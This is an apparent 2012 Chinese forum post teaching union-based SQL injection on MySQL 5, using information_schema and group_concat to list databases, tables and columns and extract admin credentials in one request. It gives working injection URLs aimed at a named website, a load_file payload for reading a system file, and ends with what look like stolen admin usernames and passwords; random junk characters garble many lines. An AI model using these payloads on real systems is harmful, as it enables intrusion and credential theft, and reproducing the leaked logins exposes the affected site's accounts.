此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似+ d6 S9 ]% a1 Q" F6 z, \. p
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
9 s5 U& t) U, }
) V3 k% P7 U- ]& S6 o- `% ~. M8 t4 Y, e; i6 g' j5 x/ E
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入( w/ ~5 y' e! b* { p+ m
! U, g0 X4 ?+ H$ K2 k; i8 R! I
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...* m! o( S ~8 } x- u: c: ]/ Z7 R
; E' w# E( ^! @4 p. z3 c9 P: {下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示4 R$ j4 b4 u2 ]3 b% S
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
6 J' V' v0 k$ \; y1 C- ~9 f0 S
$ {6 w( l% a( L' X8 vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17% d0 ]% I* n- k- m# M5 {3 E& b
+ o6 T: q- m. p$ F( P4 n3 H读出所有库:! R( s3 `9 B. F( O p) A
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA& ~( Q& c; w' w! h3 Y
4 m3 E4 r) i8 ` U8 T
9 w' `( W& U- G" z7 U& T# P. o# ]1 a* K1 X9 Y, J& E0 \
读出所有表:
( @2 E" i* D/ B4 g$ m) khttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
8 @7 V+ d% D, E4 V: A& y+ Q* L! A n" N; Z$ n9 v
读出所有表字段:# V* T U+ ^2 X4 l, J: b- C
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
7 G6 `- _$ a; V5 ?0 K0 \. s: ]1 Q5 A*/ (97,100,109,105,110)为admin的ascii码 依次类推
' U, ~5 D O' L/ L" c9 K* _3 H, [1 `1 j5 N) Y
读出所有表字段里的内容:
# ~3 g" d* S$ Rhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
. P+ T0 P8 x; E! w6 N. v# O g0 a O! x
% u' {! q9 A, ]. l, G' ~, Q, Z7 k8 a8 V% A7 C: u2 S1 j. |1 v
6 {% t. Z6 E3 @/ m; z# V7 S' M8 l% o2 i2 k
2 c7 U! w) O3 P7 \, V7 ahttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
: x# s* Q ~- o' r, Q+ e7 w9 s/ d/ e
3 h7 d3 ?! g3 Z$ x$ Xhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
?9 f0 ]* z4 D( W
7 u! o: R7 R/ D- \http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23) N- Q) }! `. I
( ^* o1 B1 ?# C, D7 y8 X0 z2 y7 n* m
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%234 Q3 x! q4 ?5 Z& @0 B
) h2 E6 ^/ P i, I0 }4 l H1 Z6 h; q
0 Y) }6 g1 A" x$ ?# E webmaster:dzb521123,simlab:simadmin20043233; Q) b& o1 k" g1 |, c
|
发表于 2012-9-13 16:37:34
收藏
支持
反对